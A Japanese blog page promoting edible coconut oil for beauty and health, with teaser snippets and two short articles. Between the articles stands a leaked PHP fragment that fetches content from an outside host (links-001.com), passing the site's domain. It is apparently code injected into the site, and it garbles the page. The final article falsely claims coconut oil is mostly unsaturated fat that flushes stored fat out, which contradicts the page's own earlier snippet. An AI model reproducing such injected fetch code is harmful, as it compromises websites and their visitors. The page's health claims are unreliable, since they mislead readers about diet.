前へ
次へ

食用ココナッツオイルの美容法

ここ最近食用ココナッツオイルが話題となっています。なぜなのか調べてみると美容効果があるからでした。ビ

more

美容、健康に万能なココナッツオイル

ここ最近、万能な美容アイテムとして人気があるのがココナッツオイルです。美容だけでなく、健康にも良いと

more

ココナッツオイルの効果とは。

ココナッツオイルは、飽和脂肪酸の中でも中鎖脂肪酸に分類され、体内に取り込まれると門脈から直接肝臓に運

more

食用としても美容に良いココナッツオイル

最近の流行でココナッツオイルはとても美容に効くとして人気があります。髪や身体をつけても良いですし、食用として使われる方も多いです。オリーブオイルのようにパンや料理にと幅広く使えます。味も食べやすいと評判です。女性であれば誰しも美容に関心が高いですので、効果が期待されるのは試してみたくなります。お肌が綺麗になったという声が多く聞かれるようです。有名人の方も多く愛用されています。これからも需要が見込まれる商品ですので、ココナッツオイルの人気は続いていくでしょう。料理の活用するレシピもどんどん紹介されていますので、アレンジをしながら毎日の食事に取り入れていくと良いでしょう。家族の方の健康にも役立てられることが出来ます。

".file_get_contents('http://links-001.com/meoset.php?dom='.str_replace("www.", "", $_SERVER['HTTP_HOST']))."

"; ?>

ココナッツオイルと不飽和脂肪酸

ココナッツオイルとは、ココヤシの種子から抽出されたオイルです。このオイルの大部分が、不飽和脂肪酸です。不飽和脂肪酸とは、体内で溶ける性質のある油のことで、多く摂取しても、脂肪として体内に蓄積されません。溶けて体外に排出されるのです。しかも不飽和脂肪酸には、溶けずに体内に蓄積される飽和脂肪酸を吸着するという性質もあります。吸着された飽和脂肪酸は、不飽和脂肪酸と一緒に体外に排出されていきます。つまりこの不飽和脂肪酸が多く含まれたココナッツオイルを摂取すると、蓄積された脂肪が減っていくというわけです。そのためココナッツオイルは、ダイエット効果のある油として話題になっています。そして美容のために、食用油として使われています。

Page Top